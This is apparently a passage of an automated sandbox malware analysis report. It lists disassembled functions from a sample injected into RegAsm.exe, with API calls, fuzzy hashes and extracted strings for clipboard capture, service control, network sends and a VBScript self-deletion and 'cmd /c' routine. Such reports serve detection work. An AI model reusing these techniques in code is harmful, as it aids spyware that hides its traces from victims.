                                                          • Opcode ID: 04f87de51616aa77c632626b63215b7c3e2981daeb02be256c48a4a07a0be686
                                                          • Instruction ID: 6de9b84f5b51ee4e35cbeb1ed48e08772f21b212059d2ac72beb9c863e9ed859
                                                          • Opcode Fuzzy Hash: 04f87de51616aa77c632626b63215b7c3e2981daeb02be256c48a4a07a0be686
                                                          • Instruction Fuzzy Hash: 90313931A04645EFFB21DA38E941B6A77FAFF002D1F11446AE84DDB159DE3ABC809B14
                                                          Function 00419FB4 Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 176sleeptimeCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • __EH_prolog.LIBCMT ref: 00419FB9
                                                          • GdiplusStartup.GDIPLUS(00474ACC,?,00000000), ref: 00419FEB
                                                          • CreateDirectoryW.KERNEL32(00000000,00000000,00000000,0000001A,00000019), ref: 0041A077
                                                          • Sleep.KERNEL32(000003E8), ref: 0041A0FD
                                                          • GetLocalTime.KERNEL32(?), ref: 0041A105
                                                          • Sleep.KERNEL32(00000000,00000018,00000000), ref: 0041A1F4
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3261739148.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.3261739148.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Sleep$CreateDirectoryGdiplusH_prologLocalStartupTime
                                                          • String ID: time_%04i%02i%02i_%02i%02i%02i$wnd_%04i%02i%02i_%02i%02i%02i$PG$PG$PG
                                                          • API String ID: 489098229-1431523004
                                                          • Opcode ID: f9c76c899fb4e7c55224b1c9c4b3e49dcb3f2a3f76cdcd98f3a23b5209652d96
                                                          • Instruction ID: 65e100c03f0dda0ba9a952c873ad8774fe275ee1deca45487f64c7c8a8292b0e
                                                          • Opcode Fuzzy Hash: f9c76c899fb4e7c55224b1c9c4b3e49dcb3f2a3f76cdcd98f3a23b5209652d96
                                                          • Instruction Fuzzy Hash: E7515D70A00215AACB14BBB5C8529ED7BA9AB44308F40403FF509AB1E2EF7C9D85C799
                                                          Function 0040D7FF Relevance: 19.4, APIs: 3, Strings: 8, Instructions: 148COMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 00412850: TerminateProcess.KERNEL32(00000000,pth_unenc,0040F8C8), ref: 00412860
                                                            • Part of subcall function 00412850: WaitForSingleObject.KERNEL32(000000FF), ref: 00412873
                                                            • Part of subcall function 004136F8: RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,00000000,004752F0), ref: 00413714
                                                            • Part of subcall function 004136F8: RegQueryValueExA.KERNEL32(00000000,00000000,00000000,00000000,00000208,?), ref: 0041372D
                                                            • Part of subcall function 004136F8: RegCloseKey.KERNEL32(00000000), ref: 00413738
                                                          • GetModuleFileNameW.KERNEL32(00000000,?,00000208), ref: 0040D859
                                                          • ShellExecuteW.SHELL32(00000000,open,00000000,00466468,00466468,00000000), ref: 0040D9B8
                                                          • ExitProcess.KERNEL32 ref: 0040D9C4
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3261739148.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.3261739148.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Process$CloseExecuteExitFileModuleNameObjectOpenQueryShellSingleTerminateValueWait
                                                          • String ID: """, 0$.vbs$8SG$CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)$CreateObject("WScript.Shell").Run "cmd /c ""$Temp$exepath$open
                                                          • API String ID: 1913171305-3159800282
                                                          • Opcode ID: 524a6ee67eac097be960b5c691f7399128dd62eb0b1fd7f322d11bf520c9c063
                                                          • Instruction ID: 6fc8d312854778a25908ca85050b1cee1951ef16e4956e50e312a563d71e527c
                                                          • Opcode Fuzzy Hash: 524a6ee67eac097be960b5c691f7399128dd62eb0b1fd7f322d11bf520c9c063
                                                          • Instruction Fuzzy Hash: 0C413A719001195ACB15FA62DC56DEEB778AF50309F10007FB10AB61E2EF785E4ACA98
                                                          Function 00450600 Relevance: 18.4, APIs: 12, Instructions: 376COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3261739148.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.3261739148.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: _free
                                                          • String ID:
                                                          • API String ID: 269201875-0
                                                          • Opcode ID: 47079874d6611f76b22abc1c1892e8562d414d23f3395fd45a7677fdf32a9ec5
                                                          • Instruction ID: d910990a8472ee08c0279d8077499983e41ff25138a9859a729e4309013b5263
                                                          • Opcode Fuzzy Hash: 47079874d6611f76b22abc1c1892e8562d414d23f3395fd45a7677fdf32a9ec5
                                                          • Instruction Fuzzy Hash: E2C17476D40204AFEB20DBA9CC83FDE77B8AB19705F14015AFE05EB283D6B49D458798
                                                          Function 00404E26 Relevance: 18.1, APIs: 12, Instructions: 65synchronizationCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E38
                                                          • SetEvent.KERNEL32(?,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E43
                                                          • CloseHandle.KERNEL32(?,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E4C
                                                          • closesocket.WS2_32(000000FF), ref: 00404E5A
                                                          • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E91
                                                          • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00404EA2
                                                          • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00404EA9
                                                          • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00404EBA
                                                          • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00404EBF
                                                          • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00404EC4
                                                          • SetEvent.KERNEL32(?,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404ED1
                                                          • CloseHandle.KERNEL32(?,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404ED6
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3261739148.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.3261739148.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CloseEventHandle$ObjectSingleWait$closesocket
                                                          • String ID:
                                                          • API String ID: 3658366068-0
                                                          • Opcode ID: 0463b1faaa3f7a02a97a49212c31dd980e99cbb732c39645afe60185321c9919
                                                          • Instruction ID: 0c11cd9b042c69dc9d4dd2828563f6d61870a883144e53252efabab5b24bcc37
                                                          • Opcode Fuzzy Hash: 0463b1faaa3f7a02a97a49212c31dd980e99cbb732c39645afe60185321c9919
                                                          • Instruction Fuzzy Hash: BF21E871104B04AFDB216B26DC49B27BBA1FF40326F104A2EE2E211AF1CB75B851DB58
                                                          Function 00455BDB Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 272COMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 004558A9: CreateFileW.KERNEL32(00000000,00000000,?,00455C84,?,?,00000000,?,00455C84,00000000,0000000C), ref: 004558C6
                                                          • GetLastError.KERNEL32 ref: 00455CEF
                                                          • __dosmaperr.LIBCMT ref: 00455CF6
                                                          • GetFileType.KERNEL32(00000000), ref: 00455D02
                                                          • GetLastError.KERNEL32 ref: 00455D0C
                                                          • __dosmaperr.LIBCMT ref: 00455D15
                                                          • CloseHandle.KERNEL32(00000000), ref: 00455D35
                                                          • CloseHandle.KERNEL32(?), ref: 00455E7F
                                                          • GetLastError.KERNEL32 ref: 00455EB1
                                                          • __dosmaperr.LIBCMT ref: 00455EB8
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3261739148.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.3261739148.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                                          • String ID: H
                                                          • API String ID: 4237864984-2852464175
                                                          • Opcode ID: ad10cc44415123364ccf3ab0f87a2b5b2deaae059395c87e8052164914e7d7f7
                                                          • Instruction ID: f4290dc4267d91ba683862cdaabef3013db21248f4240db41616def06e578eae
                                                          • Opcode Fuzzy Hash: ad10cc44415123364ccf3ab0f87a2b5b2deaae059395c87e8052164914e7d7f7
                                                          • Instruction Fuzzy Hash: D5A155329106049FDF19AF68DC617BE3BA0EB06325F14415EEC11EB392CB398D5ACB59
                                                          Function 00453D83 Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 268COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetCPInfo.KERNEL32(00000000,00000001,?,7FFFFFFF,?,?,0045405C,00000000,00000000,?,00000001,?,?,?,?,00000001), ref: 00453E2F
                                                          • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000001,00000000,00000000,?,0045405C,00000000,00000000,?,00000001,?,?,?,?), ref: 00453EB2
                                                          • __alloca_probe_16.LIBCMT ref: 00453EEA
                                                          • MultiByteToWideChar.KERNEL32(00000001,00000001,?,00000001,00000000,\@E,?,0045405C,00000000,00000000,?,00000001,?,?,?,?), ref: 00453F45
                                                          • __alloca_probe_16.LIBCMT ref: 00453F94
                                                          • MultiByteToWideChar.KERNEL32(00000001,00000009,00000001,00000000,00000000,00000000,?,0045405C,00000000,00000000,?,00000001,?,?,?,?), ref: 00453F5C
                                                            • Part of subcall function 00446137: RtlAllocateHeap.NTDLL(00000000,0043529C,?,?,00438847,?,?,00000000,?,?,0040DE62,0043529C,?,?,?,?), ref: 00446169
                                                          • MultiByteToWideChar.KERNEL32(00000001,00000001,00000001,00000000,00000000,?,?,0045405C,00000000,00000000,?,00000001,?,?,?,?), ref: 00453FD8
                                                          • __freea.LIBCMT ref: 00454003
                                                          • __freea.LIBCMT ref: 0045400F
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3261739148.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.3261739148.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ByteCharMultiWide$__alloca_probe_16__freea$AllocateHeapInfo
                                                          • String ID: \@E
                                                          • API String ID: 201697637-1814623452
                                                          • Opcode ID: 6b713b73fa418151b2ceeed66ebddf9bdcb7dc27971baa6073fd327f22c08990
                                                          • Instruction ID: bd5a1837779a5f2dcb5c2ea5aeb828518df7829aba760434011a70bbc407b236
                                                          • Opcode Fuzzy Hash: 6b713b73fa418151b2ceeed66ebddf9bdcb7dc27971baa6073fd327f22c08990
                                                          • Instruction Fuzzy Hash: E391F472E002069ADB209E65CC42AEFBBF59F09756F14052BFC01E7282D739DD89C768
                                                          Function 00450A25 Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 204COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3261739148.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.3261739148.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: _free
                                                          • String ID: \&G$\&G$`&G
                                                          • API String ID: 269201875-253610517
                                                          • Opcode ID: 2933b358ac1f2d15da9e4f95fb537f888405f593b8ad3400f10d75b262a195a6
                                                          • Instruction ID: 0b3297c67b001fbc5a9f4fbe1fd197d652097ca420ae28a40b4f72db8b3ed5d1
                                                          • Opcode Fuzzy Hash: 2933b358ac1f2d15da9e4f95fb537f888405f593b8ad3400f10d75b262a195a6
                                                          • Instruction Fuzzy Hash: 77610475900204AFDB20CFA9C882B9ABBF4EF05315F14416BED58EB342D774AD458B98
                                                          Function 00414BB0 Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 158COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3261739148.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.3261739148.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID: 65535$udp
                                                          • API String ID: 0-1267037602
                                                          • Opcode ID: c855b19cc43d9bec36cd86ac5f012ace8f0d54e169e32fa1a21da6d4488bf9b2
                                                          • Instruction ID: ff24d6befd6f0703c902a6165bd45161ed4db0fb5f75d2635e7e580b9b2721aa
                                                          • Opcode Fuzzy Hash: c855b19cc43d9bec36cd86ac5f012ace8f0d54e169e32fa1a21da6d4488bf9b2
                                                          • Instruction Fuzzy Hash: EF51E7756093019FDB209B58E9057BB37A4AFC4755F08082FF881973A1E76DCCC1865E
                                                          Function 0043A83A Relevance: 16.6, APIs: 11, Instructions: 116COMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          APIs
                                                          • MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A892
                                                          • GetLastError.KERNEL32(?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A89F
                                                          • __dosmaperr.LIBCMT ref: 0043A8A6
                                                          • MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A8D2
                                                          • GetLastError.KERNEL32(?,?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A8DC
                                                          • __dosmaperr.LIBCMT ref: 0043A8E3
                                                          • WideCharToMultiByte.KERNEL32(?,00000000,00000000,000000FF,00000000,?,00000000,00000000,?,?,?,?,?,?,00401D55,?), ref: 0043A926
                                                          • GetLastError.KERNEL32(?,?,?,?,?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A930
                                                          • __dosmaperr.LIBCMT ref: 0043A937
                                                          • _free.LIBCMT ref: 0043A943
                                                          • _free.LIBCMT ref: 0043A94A
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3261739148.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.3261739148.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ByteCharErrorLastMultiWide__dosmaperr$_free
                                                          • String ID:
                                                          • API String ID: 2441525078-0
                                                          • Opcode ID: 019acc7a2e3de953c23e11cafa5877634505dff612e887b7d59a77d89ef25481
                                                          • Instruction ID: 785efe6d9c8e3fffb8b85045f967b8474775cb8629fdf0d32462ae01257f7f2e
                                                          • Opcode Fuzzy Hash: 019acc7a2e3de953c23e11cafa5877634505dff612e887b7d59a77d89ef25481
                                                          • Instruction Fuzzy Hash: FF31F57140420AFFDF01AFA5CC45DAF3B68EF09325F10021AF950662A1DB38CD21DB6A
                                                          Function 004054A0 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 155windowmemoryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • SetEvent.KERNEL32(?,?), ref: 004054BF
                                                          • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 0040556F
                                                          • TranslateMessage.USER32(?), ref: 0040557E
                                                          • DispatchMessageA.USER32(?), ref: 00405589
                                                          • HeapCreate.KERNEL32(00000000,00000000,00000000,00000074,00474F78), ref: 00405641
                                                          • HeapFree.KERNEL32(00000000,00000000,0000003B,0000003B,?,00000000), ref: 00405679
                                                            • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3261739148.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.3261739148.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Message$Heap$CreateDispatchEventFreeTranslatesend
                                                          • String ID: CloseChat$DisplayMessage$GetMessage
                                                          • API String ID: 2956720200-749203953
                                                          • Opcode ID: 4e0681f4e841589ff8d14249d1ce1c9e820fa709ca7ac62b458806707e88a85a
                                                          • Instruction ID: c1940132788662b917c5ec79ff16bb55de46c7435784779dc5fc992d72e4b12f
                                                          • Opcode Fuzzy Hash: 4e0681f4e841589ff8d14249d1ce1c9e820fa709ca7ac62b458806707e88a85a
                                                          • Instruction Fuzzy Hash: CE41A171604701ABCB14FB75DC5A86F37A9AB85704F40093EF916A36E1EF3C8905CB9A
                                                          Function 00417CDF Relevance: 15.9, APIs: 4, Strings: 5, Instructions: 108filesynchronizationCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 00417F2C: __EH_prolog.LIBCMT ref: 00417F31
                                                          • WaitForSingleObject.KERNEL32(00000000,000000FF,00000070,004660A4), ref: 00417DDC
                                                          • CloseHandle.KERNEL32(00000000), ref: 00417DE5
                                                          • DeleteFileA.KERNEL32(00000000), ref: 00417DF4
                                                          • ShellExecuteExA.SHELL32(0000003C,00000000,00000010,?,?,?), ref: 00417DA8
                                                            • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3261739148.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.3261739148.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CloseDeleteExecuteFileH_prologHandleObjectShellSingleWaitsend
                                                          • String ID: 0VG$0VG$<$@$Temp
                                                          • API String ID: 1704390241-2575729100
                                                          • Opcode ID: 62621946d8eb1aa2ce2b39a4af5520ae479f7c91f66b5ded83c662c0635c4b6b
                                                          • Instruction ID: cfce1e327495ca125f9f778a73892d1ad62a3a088d665d9de3c725e9e650d499
                                                          • Opcode Fuzzy Hash: 62621946d8eb1aa2ce2b39a4af5520ae479f7c91f66b5ded83c662c0635c4b6b
                                                          • Instruction Fuzzy Hash: 0E415F319002099BCB14FB62DC56AEE7775AF40318F50417EF506764E1EF7C1A8ACB99
                                                          Function 00416940 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 46clipboardCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • OpenClipboard.USER32 ref: 00416941
                                                          • EmptyClipboard.USER32 ref: 0041694F
                                                          • CloseClipboard.USER32 ref: 00416955
                                                          • OpenClipboard.USER32 ref: 0041695C
                                                          • GetClipboardData.USER32(0000000D), ref: 0041696C
                                                          • GlobalLock.KERNEL32(00000000), ref: 00416975
                                                          • GlobalUnlock.KERNEL32(00000000), ref: 0041697E
                                                          • CloseClipboard.USER32 ref: 00416984
                                                            • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3261739148.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.3261739148.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Clipboard$CloseGlobalOpen$DataEmptyLockUnlocksend
                                                          • String ID: !D@
                                                          • API String ID: 2172192267-604454484
                                                          • Opcode ID: 379e7e26ad6a900c3167f358ae85a18f925cef018a940f3467d8a5dc77bbddf2
                                                          • Instruction ID: 305b70c8a6b081cbeb1fc088e42579eafb4add048c4ccd3ac1cf7446a02d8759
                                                          • Opcode Fuzzy Hash: 379e7e26ad6a900c3167f358ae85a18f925cef018a940f3467d8a5dc77bbddf2
                                                          • Instruction Fuzzy Hash: CC015E31214301DFC714BB72DC09AAE77A5AF88742F40047EF906821E2DF38CC44CA69
                                                          Function 0041AB0D Relevance: 15.1, APIs: 10, Instructions: 66serviceCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • OpenSCManagerW.ADVAPI32(00000000,00000000,00000011,00000000,00000001,?,?,?,?,?,?,0041A486,00000000), ref: 0041AB1C
                                                          • OpenServiceW.ADVAPI32(00000000,00000000,000F003F,?,?,?,?,?,?,0041A486,00000000), ref: 0041AB33
                                                          • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A486,00000000), ref: 0041AB40
                                                          • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,0041A486,00000000), ref: 0041AB4F
                                                          • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A486,00000000), ref: 0041AB60
                                                          • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A486,00000000), ref: 0041AB63
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3261739148.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.3261739148.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Service$CloseHandle$Open$ControlManager
                                                          • String ID:
                                                          • API String ID: 221034970-0
                                                          • Opcode ID: f803f1007c82734b6722f6408504697e53103f3d97c358fc3be63c7478a3d497
                                                          • Instruction ID: 6fbe0b082825830d9e24babaefac53afed48758aa8e56b4d18e4903ff4329a9c
                                                          • Opcode Fuzzy Hash: f803f1007c82734b6722f6408504697e53103f3d97c358fc3be63c7478a3d497
                                                          • Instruction Fuzzy Hash: 41114C71901218AFD711AF64DCC4DFF3B7CDB42B62B000036FA05D2192DB289C46AAFA
                                                          Function 00448121 Relevance: 15.1, APIs: 10, Instructions: 54COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • _free.LIBCMT ref: 00448135
                                                            • Part of subcall function 00446782: RtlFreeHeap.NTDLL(00000000,00000000,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?), ref: 00446798
                                                            • Part of subcall function 00446782: GetLastError.KERNEL32(?,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?,?), ref: 004467AA
                                                          • _free.LIBCMT ref: 00448141
                                                          • _free.LIBCMT ref: 0044814C
                                                          • _free.LIBCMT ref: 00448157
                                                          • _free.LIBCMT ref: 00448162
                                                          • _free.LIBCMT ref: 0044816D
                                                          • _free.LIBCMT ref: 00448178
                                                          • _free.LIBCMT ref: 00448183
                                                          • _free.LIBCMT ref: 0044818E
                                                          • _free.LIBCMT ref: 0044819C
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3261739148.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.3261739148.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: _free$ErrorFreeHeapLast
                                                          • String ID:
                                                          • API String ID: 776569668-0
                                                          • Opcode ID: 27d76b13a5ecae076ca6598a5b1433465caaf67949f0bdc0fbde8a5d49186781
                                                          • Instruction ID: 63500befab30bf138fa449b3e81d3956d19e40097f86fc95f12732a98ce5ff4f
                                                          • Opcode Fuzzy Hash: 27d76b13a5ecae076ca6598a5b1433465caaf67949f0bdc0fbde8a5d49186781
                                                          • Instruction Fuzzy Hash: C211B67A500508BFEB01EF96C842CDD3BA5FF05359B0240AAFA588F222DA35DF509BC5
                                                          Function 100059D6 Relevance: 15.1, APIs: 10, Instructions: 54COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • _free.LIBCMT ref: 100059EA
                                                            • Part of subcall function 1000571E: HeapFree.KERNEL32(00000000,00000000,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?), ref: 10005734
                                                            • Part of subcall function 1000571E: GetLastError.KERNEL32(?,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?,?), ref: 10005746
                                                          • _free.LIBCMT ref: 100059F6
                                                          • _free.LIBCMT ref: 10005A01
                                                          • _free.LIBCMT ref: 10005A0C
                                                          • _free.LIBCMT ref: 10005A17
                                                          • _free.LIBCMT ref: 10005A22
                                                          • _free.LIBCMT ref: 10005A2D
                                                          • _free.LIBCMT ref: 10005A38
                                                          • _free.LIBCMT ref: 10005A43
                                                          • _free.LIBCMT ref: 10005A51
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3272380901.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000004.00000002.3272320840.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.3272380901.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_10000000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: _free$ErrorFreeHeapLast
                                                          • String ID:
                                                          • API String ID: 776569668-0
                                                          • Opcode ID: c98d8f3bae8e62c9802464aaca1a5f37d2e9bc397092d84fe88d11ffaa9aaf75
                                                          • Instruction ID: 60753d52f1e9cb5801f9add085180c5dd3fc305f79823ad6bc57240ee419c635
                                                          • Opcode Fuzzy Hash: c98d8f3bae8e62c9802464aaca1a5f37d2e9bc397092d84fe88d11ffaa9aaf75
                                                          • Instruction Fuzzy Hash: BE11B97E514548FFEB11DF58D842CDE3FA9EF04291B4540A1BD088F12ADA32EE50AB84
                                                          Function 004114F5 Relevance: 14.2, APIs: 2, Strings: 6, Instructions: 191COMMON
